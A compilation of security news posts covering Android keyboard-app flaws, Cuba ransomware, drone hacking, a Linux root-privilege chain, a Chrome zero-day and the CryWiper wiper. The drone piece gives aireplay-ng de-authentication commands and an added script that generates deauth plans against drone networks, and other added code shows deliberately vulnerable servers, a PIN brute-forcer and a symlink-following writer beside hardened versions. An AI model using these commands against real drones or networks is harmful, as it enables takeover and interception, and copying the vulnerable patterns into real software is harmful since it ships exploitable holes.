Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone.
Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively two million installs that are affected by multiple flaws (CVE-2022-45477, CVE-2022-45478, CVE-2022-45479, CVE-2022-45480, CVE-2022-45481, CVE-2022-45482, CVE-2022-45483) that can be exploited by attackers to compromise a mobile phone.
These apps turn a phone into a remote keyboard and mouse: a server component runs on the desktop or laptop, and the Android app connects to it over the network and transmits mouse and keyboard events.
The three apps (Lazy Mouse, PC Keyboard, and Telepad) are available on the official Google Play Store.
CyRC experts warn of weak or missing authentication mechanisms, missing authorization, and insecure communication vulnerabilities in the three apps.
“An exploit of the authentication and authorization vulnerabilities could allow remote unauthenticated attackers to execute arbitrary commands. Similarly, an exploit of the insecure communication vulnerability exposes the user’s keystrokes, including sensitive information such as usernames and passwords.” reads the analysis published by CyRC.
“Mouse and keyboard applications use a variety of network protocols to exchange mouse and keystroke instructions. Although the vulnerabilities are all related to the authentication, authorization, and transmission implementations, each application’s failure mechanism is different. The CyRC found vulnerabilities that enable authentication bypasses and remote code execution in the three applications, but did not find a single method of exploitation that applies to all three.”
The impacted versions are:
- Telepad versions 1.0.7 and prior
- PC Keyboard versions 30 and prior
- Lazy Mouse versions 2.0.1 and prior
Below are the details of the critical vulnerabilities:
Telepad allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication.
PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication.
The default configuration of Lazy Mouse does not require a password, allowing remote unauthenticated users to execute arbitrary code with no prior authorization or authentication.
The Lazy Mouse server enforces weak password requirements and doesn’t implement rate limiting, allowing remote unauthenticated users to easily and quickly brute force the PIN and execute arbitrary commands.
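The three advisories describe one design error in three forms: a network service that accepts “type this” and “run this” instructions either never checks who is sending them (Telepad, PC Keyboard) or checks a PIN that is optional by default, short, and never throttled (Lazy Mouse). The added example below is not code from any of the three apps; it contrasts that pattern with a hardened server over a hypothetical line-based protocol (the AUTH/KEY/CMD verbs are an assumption made for the example). The hardened side refuses to start without a secret, compares it in constant time, locks a peer out after five failures, and gates every action on an authenticated session. The brute_force_pin helper shows why the rate limit matters: against the weak server a 4-digit PIN falls after at most 10,000 guesses, while the hardened server evaluates only five.

```python
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Hypothetical line protocol used only in this example (not any app's real wire format):
#   "AUTH <secret>"   -> "OK" / "DENIED" / "LOCKED"
#   "KEY <text>"      -> the desktop side types <text>
#   "CMD <command>"   -> the desktop side runs <command>


class VulnerableServer:
    """Reproduces the advisories' failure modes: KEY/CMD are never gated on
    authentication (Telepad, PC Keyboard); the PIN is optional by default and,
    when set, is compared with == and without any attempt limit (Lazy Mouse)."""

    def __init__(self, pin: Optional[str] = None):
        self.pin = pin
        self.executed: List[str] = []

    def handle(self, peer: str, line: str) -> str:
        verb, _, arg = line.partition(" ")
        if verb == "AUTH":
            return "OK" if self.pin is None or arg == self.pin else "DENIED"
        if verb in ("KEY", "CMD"):
            self.executed.append(f"{peer}: {line}")  # executed for anyone who asks
            return "OK"
        return "ERR"


@dataclass
class _Session:
    authenticated: bool = False
    failures: int = 0
    locked_until: float = 0.0


class HardenedServer:
    """Refuses to run without a secret, compares it in constant time, locks a
    peer out after repeated failures, and gates every action on its session."""

    MAX_FAILURES = 5
    LOCKOUT_SECONDS = 60.0

    def __init__(self, secret: Optional[str] = None, clock=time.monotonic):
        # Never fall back to "no password": mint a random pairing secret instead.
        self.secret = secret or secrets.token_urlsafe(16)
        self.clock = clock  # injectable so the lockout can be exercised deterministically
        self.sessions: Dict[str, _Session] = {}
        self.executed: List[str] = []

    def handle(self, peer: str, line: str) -> str:
        s = self.sessions.setdefault(peer, _Session())
        verb, _, arg = line.partition(" ")
        if verb == "AUTH":
            if self.clock() < s.locked_until:
                return "LOCKED"
            if hmac.compare_digest(arg.encode(), self.secret.encode()):
                s.authenticated, s.failures = True, 0
                return "OK"
            s.failures += 1
            if s.failures >= self.MAX_FAILURES:
                s.failures = 0
                s.locked_until = self.clock() + self.LOCKOUT_SECONDS
            return "DENIED"
        if not s.authenticated:
            return "DENIED"  # no session, no keystrokes, no commands
        if verb in ("KEY", "CMD"):
            self.executed.append(f"{peer}: {line}")
            return "OK"
        return "ERR"


def brute_force_pin(server, peer: str = "attacker", digits: int = 4) -> Tuple[Optional[str], int]:
    """Guess every numeric PIN of the given length in order.
    Returns (pin_or_None, number of guesses the server actually evaluated)."""
    evaluated = 0
    for n in range(10 ** digits):
        guess = f"{n:0{digits}d}"
        resp = server.handle(peer, f"AUTH {guess}")
        if resp != "LOCKED":
            evaluated += 1
        if resp == "OK":
            return guess, evaluated
    return None, evaluated


if __name__ == "__main__":
    weak = VulnerableServer(pin="4321")
    print(weak.handle("anyone", "CMD calc.exe"))   # OK: the command runs unauthenticated
    print(brute_force_pin(weak))                   # ('4321', 4322): nothing slowed it down
    strong = HardenedServer(secret="4321", clock=lambda: 1000.0)  # frozen clock: lockout never expires
    print(strong.handle("anyone", "CMD calc.exe"))  # DENIED
    print(brute_force_pin(strong))                  # (None, 5): locked out after five failures
```

Transport security is the other half of the advisories: a real implementation would run the same server behind TLS or a pairing-derived key so that keystrokes are not readable on the network, which this example does not cover.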
The vulnerabilities were first reported to the developers on August 13, 2022; CyRC published the advisory after receiving no response from the development teams behind these apps.
This is the timeline for these vulnerabilities:
- August 13, 2022: Initial disclosure
- August 18, 2022: Follow-up communication
- October 12, 2022: Final follow-up communication
- November 30, 2022: Advisory published by Synopsys
“The CyRC reached out to the developers multiple times but has not received a response within the 90 day timeline dictated by our responsible disclosure policy. These three applications are widely used but they are neither maintained nor supported, and evidently, security was not a factor when these applications were developed.” concludes the report. “The CyRC recommends removing the applications immediately.”
(SecurityAffairs – hacking, Android Keyboard)
The post Android Keyboard Apps with 2 Million downloads can remotely hack your device appeared first on Security Affairs.
Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022.
The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million U.S. Dollars (USD) and received more than $60 million in ransom payments from over 100 victims worldwide as of August 2022, the US government states.
Like other ransomware gangs, Cuba uses ‘double extortion’: it exfiltrates data from the target systems before encrypting them, demands a ransom payment, and threatens to publicly release the stolen data if payment is not made.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory that provides technical details about the gang’s operations, including tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware.
“FBI has identified a sharp increase in both the number of compromised U.S. entities and the ransom amounts demanded by Cuba actors.” reads the report. “Since spring 2022, Cuba ransomware actors have expanded their TTPs. Third-party and open-source reports have identified a possible link between Cuba ransomware actors, RomCom Remote Access Trojan (RAT) actors, and Industrial Spy ransomware actors.”
Since December 2021, Cuba operators have continued to target U.S. entities in the Financial Services, Government Facilities, Healthcare and Public Health, Critical Manufacturing, and Information Technology sectors.
The Cuba gang has leveraged multiple techniques to gain initial access to victims’ networks, including exploitation of known vulnerabilities in commercial software [T1190], phishing campaigns [T1566], compromised credentials [T1078], and legitimate remote desktop protocol (RDP) tools [T1563.002].
After gaining initial access, the attackers distributed Cuba ransomware on compromised systems using the Hancitor loader.
Below are the vulnerabilities exploited by the group in its attacks:
- CVE-2022-24521 – elevation of privilege flaw in Windows Common Log File System (CLFS) Driver
- CVE-2020-1472 – elevation of privilege flaw in Netlogon remote protocol (aka ZeroLogon)
In May, MalwareHunterTeam found evidence that links Cuba and the Industrial Spy crew.
Since spring 2022, multiple reports also linked RomCom RAT actors to the Cuba gang.
Additional details are included in the advisory “Alert (AA22-335A) #StopRansomware: Cuba Ransomware.”
(SecurityAffairs – hacking, CISA)
The post Cuba Ransomware received over $60M in Ransom payments as of August 2022 appeared first on Security Affairs.
Threat actors could exploit drones for payload delivery, kinetic operations, and even diversion, experts warn.
Once a niche technology, drones are about to explode in terms of market growth and enterprise adoption. Naturally, threat actors follow the trend and exploit the technology for surveillance, payload delivery, kinetic operations, and even diversion.
There exists a class of tiny and highly maneuverable devices that introduce a variety of cybersecurity risks you probably haven’t considered before.
Drones currently occupy a unique legal position: they are classified both as aircraft and as networked computing devices. For a malicious operator this ambiguity is an advantage, because a victim who counter-attacks a drone may violate the regulations that protect aircraft as well as the anti-hacking laws that protect computers, their data, and networks.
This article is going to explore cybersecurity considerations surrounding drone platforms through an initial review of drone market trends, popular drone hacking tools, and general drone hacking techniques that may be used to compromise enterprise drone platforms, including how drone platforms themselves may be used as malicious hacking platforms.
A secondary outcome of this article is to help spur awareness around a once niche space of technology that is about to explode in terms of market growth and enterprise adoption.
According to research firm Statista, the global retail drone market is expected to reach $90 billion by 2030, with Defense, Enterprise, and Logistics being the primary industries driving growth. Within the United States alone, nearly 300,000 commercial pilot licenses have been issued as of 2022, compared to nearly 1 million individual drones registered with the Federal Aviation Administration (FAA) under its weight and commercial compliance rules.
This number does not account for drones flown by amateur pilots or hobbyists, who need no professional licensure, nor for drones under the weight threshold (typically under 250 grams) that are exempt from registration with local or federal authorities.
In China, the retail drone market reached $15 billion in 2021, with projections to exceed $22 billion by 2024. Drone pilot licenses issued throughout China exceed the United States, with over 780,000 registered pilots and close to 850,000 registered drones.
These numbers suggest that a once uncluttered skyline may soon be teeming with millions of drones, which raises questions about enterprise security, privacy, and cyber threats that arrive from the sky.
Departing from the general market statistics concerning drones, it is prudent to better understand how a flying laptop poses a threat to enterprise operations. From a cybercriminal perspective, drones are an ideal tool to carry out malicious attacks because they generally provide a greater layer of separation between the bad actor, the aircraft itself, and the actions executed by the physical drone platform.
Laptops or workstations operate on the ground and are more easily associated with an end user, whereas a flying, computerized aircraft with a range of 10 km can be harder to trace to a specific individual or geographical area. Drones also offer cybercriminals a great degree of flexibility: they are affordable, highly modifiable, and can operate across a greater range of weather conditions, flight distances, and altitudes than the semi-stationary workstations hackers traditionally operate from.
Let’s dive into some examples of how enterprises must account for external drones entering their airspace and cyber threats to drones operated by the enterprise.
An external drone not owned or operated by the enterprise can achieve many objectives useful to cyber criminals wishing to attack an organization. These objectives include but are not limited to site surveillance, photographic reconnaissance, physical or electronic payload delivery, kinetic operations (flying a drone into something for a specific purpose), and as a diversionary tactic.
A prime example is using a drone to fly over a potential target to visually map out physical security barriers prior to a robbery, identifying security guard patrol locations and schedules, or determining if anyone even responds to the aircraft while it is present. Drone platforms are also commonly used globally to smuggle contraband such as drugs, cellphones, or weapons into prisons with an alarming success rate.
Enterprises with sound counter drone programs in place may still be limited in how they respond to external drone threats as it is commonly unlawful to simply shoot them down or capture them. Within the United States for example, operating a drone within Class G, uncontrolled airspace over another entity’s property without advanced notice is legally allowed. Some state and local laws allow property owners and businesses to file trespass claims against operators but the difficulty is often associating the drone platform to its operator and serving them written notice.
Similar laws allowing some degree of aerial trespass exist in other international jurisdictions, including Australia, Singapore and the United Kingdom, with certain limitations. Enterprises are at a further disadvantage as malicious drone platforms cost anywhere from a few hundred to a thousand dollars, while Counter Unmanned Aircraft Systems (CUAS) can cost well into the millions of dollars per annum just for the software subscription, not counting the personnel to operate it.
From a risk management perspective, drone mitigation using detective controls such as CUAS are simply non-sustainable for many enterprises as the costs will typically far exceed the inherent risks.
Attacks against enterprise-owned drones
Cyberattacks against drones that an enterprise owns and operates are an entirely different animal. Further considerations must be taken to secure the drone’s onboard storage, to ensure that the routes drones travel are relatively safe (i.e., free from obstacles, sparsely populated, etc.), and that the Wi-Fi or radio frequency (RF) links used by the platform are properly encrypted against eavesdropping or manipulation.
Most drone platforms provide an onboard mini or micro SD card slot for local storage. Common attacks against enterprise drones include platform takeover, where an attacker uses RF, Wi-Fi, or a subscription service like Aerial Armor to detect the flight paths of drones in a geographical area, performs de-authentication attacks, takes control of the drone, and lands the stolen drone in a location of their choosing.
From here, the attacker can physically remove onboard storage and pilfer the contents, depending on the storage configuration or potentially introduce malware via the SD card port, then leave the drone for the owner to find. Cybercriminals may also attempt to poison the geolocation instructions or Return To Home (RTH) coordinates of the drone to intentionally damage the aircraft or use it for other nefarious purposes causing the enterprise monetary damages in lost drone equipment, legal trouble, and reputational harm.
Let’s review common tools and platforms built specifically to hack drones and see how some of them may assist cybersecurity assessments in real-world scenarios.
The first tool previewed in this article is Dronesploit, a Command Line Interface (CLI) solution which directly resembles and is similarly structured to the Metasploit Framework. Dronesploit seeks to combine various tools useful for penetration testing specific to drone platforms.
Dronesploit depends on Aircrack-ng being installed and fully functional, and on a wireless network adapter capable of sniffing wireless networks and performing packet injection. The first step before launching Dronesploit is to put an available wireless interface into monitor mode with the “airmon-ng start wlan0” command (note that airmon-ng typically renames the interface, for example to wlan0mon; the examples in this article keep wlan0). Monitor mode can be verified before proceeding with the “iwconfig” command.
Once the wireless network interface is placed into Monitor mode, Dronesploit should be launched from a secondary command window while allowing the monitored interface to remain active. Dronesploit is ready to use once all warning messages stop prompting the user to take specific action (such as starting an interface in ‘Monitor’ mode).
Dronesploit is ideal for assessing Wi-Fi based drones like the DJI Tello or Hobbico drone platforms, but it also has general-purpose auxiliary modules that are effective across many drone models.
Some of the broadly useful modules reside in Dronesploit’s auxiliary family. Metasploit users will recognise the familiar commands (use, set, run) to select modules, set options, and execute drone attacks.
The “wifi/find_ssids” auxiliary module, for example, takes the monitored interface and a timeout value as its options and lists the SSIDs in range. Dronesploit can also directly call various elements of Aircrack-ng to capture and attempt to crack WPA2 wireless handshakes, making it a highly versatile tool.
Danger Drone platform
The next tool the article will preview is the Danger Drone platform, developed and discussed by penetration testing provider Bishop Fox. Danger Drone is an affordable, mobile drone platform that pairs a 3D-printed airframe with a Raspberry Pi single-board computer.
It is optimized to carry a WiFi Pineapple for wireless network auditing and several other USB peripherals, such as Alfa wireless network adapters, to support aerial penetration testing from a flying drone. Imagine a drone flying onto private property unnoticed, landing on the roof of a building, and performing wireless network attacks against the computers underneath or around it. Scary stuff…
The article will conclude with some more pointed drone pentesting examples using Aircrack-ng itself. Using the monitored interface from the Dronesploit example, aspects of Aircrack-ng can be used to perform several useful drone security tests, including identification of wireless drone networks, de-authentication of connected devices like a drone controller, or cracking of the WEP/WPA keys.
Running “airodump-ng wlan0” on the monitor-mode interface identifies nearby drone Wi-Fi signals, including the MAC address (BSSID) of the broadcasting device, the network encryption scheme, and the wireless authentication standard used by the drone. In the author’s test, a hobbyist-level drone from Sanrock using open Wi-Fi and a DJI drone with enhanced Wi-Fi security protections were identified.
Drones establish a private Wi-Fi network so that the controller and mobile application can interact with the aircraft. The Sanrock drone’s network is open: it requires no authentication, such as a pre-shared key, to connect. A quick way to find the drone’s IP address is to join the broadcasting SSID from Kali Linux or another system, such as a mobile phone, and then compare the interface’s address information (“ip addr” on Linux, “ipconfig /all” on Windows) with the connection properties of the drone network; the drone is usually the default gateway of that network. Vulnerability scans and other tools can then be directed at that address to uncover other targets and start assessing them for points of entry.
Switching back to Aircrack-ng, a de-authentication attack can be carried out with airodump-ng in conjunction with aireplay-ng. These attacks are useful either for drone takeover or for forcing a reconnection so that the WPA handshake can be captured for offline cracking. Attackers can also sabotage Return to Home (RTH) instructions through geolocation poisoning: communications between the pilot and the drone are interrupted, the drone’s internal safety routines kick in and instruct it to navigate to and land at a pre-configured location, and the platform can then be physically stolen.
The commands below show how airodump-ng is first used to discover a connected station (a client such as a mobile device) and how aireplay-ng then sends de-authentication frames that disconnect that client. In this case the Sanrock drone has no Wi-Fi authentication mechanism such as a WPA pre-shared key to capture, but the tests did result in mobile application disconnection and drone takeover.
The command “airodump-ng -c 1 --bssid 98:C9:7C: -w capture19 wlan0” starts a live capture of the target BSSID on channel 1, written to files prefixed capture19; this capture is where WEP IVs or a WPA handshake would be recorded. The capture file can later be fed to aircrack-ng to attempt brute-force recovery of the pre-shared key, which is outside the scope of this article. With the capture running, “aireplay-ng -0 100 -a 98:C9:7C:13:8B:34 -c 3C:2E:FF:BE:9F:03 wlan0” sends 100 rounds of de-authentication frames to the client, which results in the connected client being disconnected. Notice the high count of lost (unacknowledged) frames in aireplay-ng’s output, indicating an interrupted connection. Assessments could continue with tools like Nmap and its scripting engine to locate open ports, or OpenVAS to perform vulnerability scanning. With this in mind, a common trend begins to emerge: drone platforms are very similar to mobile computing devices like laptops, and enterprises should consider assessing drone risk in a similar context.
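The identification step above is easier to reason about from airodump-ng’s CSV output (written next to the capture file whenever -w is used) than from its live screen. The added example below is not from the article or from Aircrack-ng: it parses a constructed airodump-ng CSV (the column layout is airodump-ng’s, but every address, timestamp and ESSID is invented), pairs each access point with the stations associated to it, flags networks whose ESSID looks drone-like (the hint list is an assumption) and classifies what a de-authentication buys against each encryption mode, then assembles the airodump-ng/aireplay-ng pair from the text for every AP/client combination. ESSIDs containing commas are not handled, since airodump-ng does not quote them.

```python
import csv
import io
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed airodump-ng CSV: the column layout is what airodump-ng -w <prefix> writes,
# but every address, timestamp and ESSID here is invented for the example.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
98:C9:7C:13:8B:34, 2022-11-01 10:00:01, 2022-11-01 10:05:22,  1,  54, OPN , ,   , -38,      312,        0,   0.  0.  0.  0,  12, SANROCK_U61W, 
60:60:1F:AA:BB:CC, 2022-11-01 10:00:03, 2022-11-01 10:05:21,  6, 130, WPA2, CCMP, PSK, -52,      290,        0,   0.  0.  0.  0,  14, Mavic-Air-ABCD, 
C0:FF:EE:00:11:22, 2022-11-01 10:00:02, 2022-11-01 10:05:23, 11, 195, WPA2, CCMP, PSK, -70,      400,        0,   0.  0.  0.  0,   9, CorpGuest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
3C:2E:FF:BE:9F:03, 2022-11-01 10:00:05, 2022-11-01 10:05:20, -45,      188, 98:C9:7C:13:8B:34, SANROCK_U61W
AA:BB:CC:DD:EE:01, 2022-11-01 10:01:00, 2022-11-01 10:05:19, -60,       40, 60:60:1F:AA:BB:CC, 
AA:BB:CC:DD:EE:02, 2022-11-01 10:02:00, 2022-11-01 10:05:18, -80,        3, (not associated), Mavic-Air-ABCD
"""

# ESSID fragments that commonly identify consumer drone access points (assumption; extend per fleet).
DRONE_SSID_HINTS = ("TELLO", "SANROCK", "DJI", "MAVIC", "PHANTOM", "SPARK", "HOBBICO", "DRONE")


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str
    essid: str
    clients: List[str] = field(default_factory=list)

    @property
    def looks_like_drone(self) -> bool:
        upper = self.essid.upper()
        return any(hint in upper for hint in DRONE_SSID_HINTS)

    @property
    def exposure(self) -> str:
        """What a de-authentication against this network buys an attacker."""
        p = self.privacy.upper()
        if p == "OPN":
            return "open: no key to capture; a de-auth alone disconnects the controller"
        if p == "WEP":
            return "WEP: IVs from the capture file can be cracked offline"
        if "WPA3" in p:
            return "WPA3: the SAE handshake does not yield an offline-crackable PSK"
        return f"{self.privacy}: de-auth forces a new 4-way handshake, captured for offline cracking"


def parse_airodump_csv(text: str) -> List[AccessPoint]:
    """Read both sections of an airodump-ng CSV and attach associated stations to their AP."""
    aps: Dict[str, AccessPoint] = {}
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [cell.strip() for cell in row]
        if not row or row == [""]:
            continue
        if row[0] == "BSSID":          # header of the access-point section
            section = "ap"
            continue
        if row[0] == "Station MAC":    # header of the station section
            section = "station"
            continue
        if section == "ap":
            # BSSID, first, last, channel, speed, privacy, cipher, auth, power, beacons, IVs, IP, ID-length, ESSID, Key
            aps[row[0]] = AccessPoint(bssid=row[0], channel=int(row[3]), privacy=row[5], essid=row[13])
        elif section == "station":
            # Station MAC, first, last, power, packets, BSSID, probed ESSIDs
            if row[5] in aps:          # "(not associated)" stations are skipped
                aps[row[5]].clients.append(row[0])
    return list(aps.values())


def deauth_plan(aps: List[AccessPoint], iface: str = "wlan0", prefix: str = "capture19") -> List[dict]:
    """For every drone-looking AP with an associated client, the capture/de-auth pair from the article."""
    plan = []
    for ap in aps:
        if not ap.looks_like_drone:
            continue
        for client in ap.clients:
            plan.append({
                "essid": ap.essid, "bssid": ap.bssid, "client": client, "exposure": ap.exposure,
                "capture": f"airodump-ng -c {ap.channel} --bssid {ap.bssid} -w {prefix} {iface}",
                "deauth": f"aireplay-ng -0 100 -a {ap.bssid} -c {client} {iface}",
            })
    return plan


if __name__ == "__main__":
    for step in deauth_plan(parse_airodump_csv(SAMPLE_CSV)):
        print(f"{step['essid']} ({step['exposure']})\n  {step['capture']}\n  {step['deauth']}")
```

On a real engagement the input is the capture19-01.csv that airodump-ng writes, and the plan is reviewed against the rules of engagement before any aireplay-ng frame is sent; the CorpGuest network in the sample is deliberately left out of the plan because nothing about it suggests a drone.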
This article doesn’t encourage unauthorized assessment of drone platforms not owned by the reader, nor does it educate the reader on in-depth hacking techniques against such platforms. The article simply demonstrates very basic approaches that may be used to assess enterprise drone security and assist enterprises in formulating defensive strategies based on their risk profile.
The article briefly showcased short-term drone market projections, which reflect the likelihood of drone presence globally. The article covered common malicious use cases enacted by bad actors, such as reconnaissance, some of the tools and platforms available to cybercriminals, and live examples of how these tools may be used maliciously.
Enterprises are accustomed to contending with cyber threats, which operate on the same ground-based playing field as they do. Now, they must be more vigilant than ever, as they must account for cyberattacks sourcing from the sky. It is vital that enterprises understand their position on drone-based risks and ensure appropriate policies, procedures, and that personnel are positioned to respond to these threats accordingly.
About the author: Adam Kohnke, contributor at CyberNews
(SecurityAffairs – hacking, drones)
The post <strong>Attack of drones: airborne cybersecurity nightmare</strong> appeared first on Security Affairs.
Qualys researchers demonstrated how to chain a new Linux flaw with two other issues to gain full root privileges on an impacted system.
Researchers at the Qualys’ Threat Research Unit demonstrated how to chain a new Linux vulnerability, tracked as CVE-2022-3328, with two other flaws to gain full root privileges on an affected system.
The vulnerability resides in snap-confine, a SUID-root program installed by default on Ubuntu.
snap-confine is used internally by snapd to construct the execution environment for snap applications, i.e., it confines them.
CVE-2022-3328 is a race condition in snapd that can lead to local privilege escalation and arbitrary code execution.
“In February 2022, Qualys Threat Research Unit (TRU) published CVE-2021-44731 in our “Lemmings” advisory. The vulnerability (CVE-2022-3328) was introduced in February 2022 by the patch for CVE-2021-44731.” reads the post published by Qualys.
“The Qualys Threat Research Unit (TRU) exploited this bug in Ubuntu Server by combining it with two vulnerabilities in multipathd called Leeloo Multipath (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973), to obtain full root privileges.”
The experts chained the CVE-2022-3328 flaw with two recently discovered flaws in Multipathd, which is a daemon in charge of checking for failed paths.
Multipathd runs as root in the default installation of several distributions, including Ubuntu.
The two vulnerabilities in the Multipathd are:
CVE-2022-41974 (CVSS 7.8) – The device-mapper-multipath allows local users to obtain root access, exploited alone or in conjunction with CVE-2022-41973. Local users that are able to write to UNIX domain sockets can bypass access controls and manipulate the multipath setup. This issue occurs because an attacker can repeat a keyword, which is mishandled when arithmetic ADD is used instead of bitwise OR. This could lead to local privilege escalation to root.
CVE-2022-41973 (CVSS 7.0) – The device-mapper-multipath allows local users to obtain root access, in conjunction with CVE-2022-41974. Local users that are able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which may lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.
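CVE-2022-41973 belongs to a well-known class: a privileged daemon composes a path inside a world-writable directory (/dev/shm) and opens it in a way that follows a symlink another user planted there, so the write lands wherever the attacker pointed it. The added example below is not multipathd’s code and its file names are invented; it shows the vulnerable open-by-path pattern beside a hardened writer that rejects path components in the entry name, opens relative to a directory descriptor with O_NOFOLLOW, and fstat-checks the result before writing. The demo plants a symlink inside a temporary “shm” directory that points outside it, then shows the unsafe writer following it and the safe writer refusing (Linux/Unix only; dir_fd and O_NOFOLLOW are used).

```python
import os
import stat
import tempfile
from typing import Dict


def write_state_unsafe(state_dir: str, name: str, data: bytes) -> str:
    """Vulnerable pattern (constructed to mirror the bug class, not multipathd's code):
    build a path under a shared directory and open it by name, following symlinks."""
    path = os.path.join(state_dir, name)
    with open(path, "wb") as f:        # a symlink planted here redirects the write
        f.write(data)
    return os.path.realpath(path)      # where the bytes actually went


def write_state_safe(state_dir: str, name: str, data: bytes) -> str:
    """Hardened: no path components in the name, open relative to a directory fd,
    never follow a symlink at the final component, and verify what was opened."""
    if not name or name in (".", "..") or os.sep in name or "\0" in name:
        raise ValueError(f"refusing unsafe entry name {name!r}")
    dir_fd = os.open(state_dir, os.O_RDONLY | os.O_DIRECTORY)
    try:
        # O_NOFOLLOW makes the kernel fail with ELOOP if `name` is a symlink.
        fd = os.open(name, os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0o600, dir_fd=dir_fd)
    finally:
        os.close(dir_fd)
    try:
        st = os.fstat(fd)
        # Reject anything that is not a regular file we own (e.g. a pre-created
        # file or hard link left by another user in the shared directory).
        if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
            raise PermissionError(f"{name!r} is not a regular file owned by us")
        os.ftruncate(fd, 0)
        os.write(fd, data)
    finally:
        os.close(fd)
    return os.path.join(state_dir, name)


def rejects_traversal(state_dir: str) -> bool:
    """The safe writer refuses names with path components before touching the filesystem."""
    try:
        write_state_safe(state_dir, "../escape", b"x")
        return False
    except ValueError:
        return True


def demo() -> Dict[str, object]:
    """Plant a symlink in a shared state directory pointing outside it, then
    compare what the unsafe and safe writers do with it."""
    with tempfile.TemporaryDirectory() as root:
        state_dir = os.path.join(root, "shm")                 # stands in for /dev/shm
        os.mkdir(state_dir)
        target = os.path.join(root, "privileged_target")     # stands in for a root-owned file
        open(target, "wb").close()
        os.symlink(target, os.path.join(state_dir, "multipath.state"))

        landed_on = write_state_unsafe(state_dir, "multipath.state", b"owned")
        with open(target, "rb") as f:
            target_contents = f.read()

        try:
            write_state_safe(state_dir, "multipath.state", b"owned")
            refused, err = False, None
        except OSError as e:           # ELOOP from O_NOFOLLOW
            refused, err = True, e.errno

        # A genuine regular file of our own is still written normally.
        write_state_safe(state_dir, "fresh.state", b"ok")
        with open(os.path.join(state_dir, "fresh.state"), "rb") as f:
            fresh = f.read()

        return {
            "unsafe_followed_symlink": landed_on == os.path.realpath(target),
            "target_contents": target_contents,
            "safe_refused": refused,
            "safe_errno": err,
            "fresh": fresh,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The directory descriptor closes the window between checking and using the path, and the fstat check covers the hard-link variant that O_NOFOLLOW alone does not; the CVE-2022-41974 half of the chain (the repeated-keyword arithmetic bug) is a separate parsing flaw and is not modelled here.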
“Successful exploitation of the three vulnerabilities lets any unprivileged user gain root privileges on the vulnerable device. Qualys security researchers have verified the vulnerability, developed an exploit and obtained full root privileges on default installations of Ubuntu.” Qualys added.
The FAQ section included in the advisory confirms that the vulnerability is not remotely exploitable.
(SecurityAffairs – hacking, Linux)
The post A new Linux flaw can be chained with other two bugs to gain full root privileges appeared first on Security Affairs.
Google released security updates to address a new Chrome zero-day flaw, tracked as CVE-2022-4262, actively exploited in the wild.
Google rolled out an emergency security update for the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4262, that is actively exploited.
The vulnerability was reported by Clement Lecigne of Google’s Threat Analysis Group on November 29, 2022.
“CVE-2022-4262: Type Confusion in V8. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2022-11-29” reads the advisory published by Google. “Google is aware that an exploit for CVE-2022-4262 exists in the wild.”
As usual, Google withheld technical details about the vulnerability to give users time to update their Chrome installations. A type confusion in V8 can nonetheless be exploited by threat actors to potentially achieve arbitrary code execution.
Google fixed the zero-day with the release of 108.0.5359.94 for Mac and Linux and 108.0.5359.94/.95 for Windows, which the company plans to roll out over the coming days and weeks.
CVE-2022-4262 is the ninth actively exploited Chrome zero-day addressed by Google this year; below are some of the other zero-days fixed by the tech giant in 2022:
- CVE-2022-4135 (November 25) – heap buffer overflow in GPU
- CVE-2022-3075 (September 2) – insufficient data validation in Mojo, the collection of runtime libraries Chrome uses for IPC
- CVE-2022-2856 (August 17) – insufficient validation of untrusted input in Intents
- CVE-2022-2294 (July 4) – heap buffer overflow in the Web Real-Time Communications (WebRTC) component
- CVE-2022-0609 (February 14) – use-after-free in the Animation component
Chrome users are recommended to update their installations as soon as possible to neutralize attacks attempting to exploit the zero-day.
(SecurityAffairs – hacking, zero-day)
The post Google fixed the ninth actively exploited Chrome zeroday this year appeared first on Security Affairs.
Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts.
Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts.
The malware masquerades as ransomware, but the analysis of the code demonstrates that it does not actually encrypt, but only destroys data in the infected system.
According to Kaspersky, the wiper was first spotted in the fall of 2022 when it was employed in an attack against an organization’s network in the Russian Federation.
“After examining a sample of malware, we found out that this Trojan, although it masquerades as a ransomware and extorts money from the victim for “decrypting” data, does not actually encrypt, but purposefully destroys data in the affected system.” reads the report published by Kaspersky. “Moreover, an analysis of the Trojan’s program code showed that this was not a developer’s mistake, but his original intention.”
The CryWiper sample analyzed by the researchers is a 64-bit Windows executable written in C++ and compiled with the MinGW-w64 toolkit and the GCC compiler. The experts pointed out that this toolchain is unusual for C/C++ malware targeting Windows.
The experts believe the malware was specifically designed to target Windows systems because it uses many calls to WinAPI functions.
Once executed, CryWiper uses the Task Scheduler and the schtasks create command to create a task that runs its executable every 5 minutes.
The wiper then contacts the command and control server with an HTTP GET request, passing the name of the infected system as a parameter.
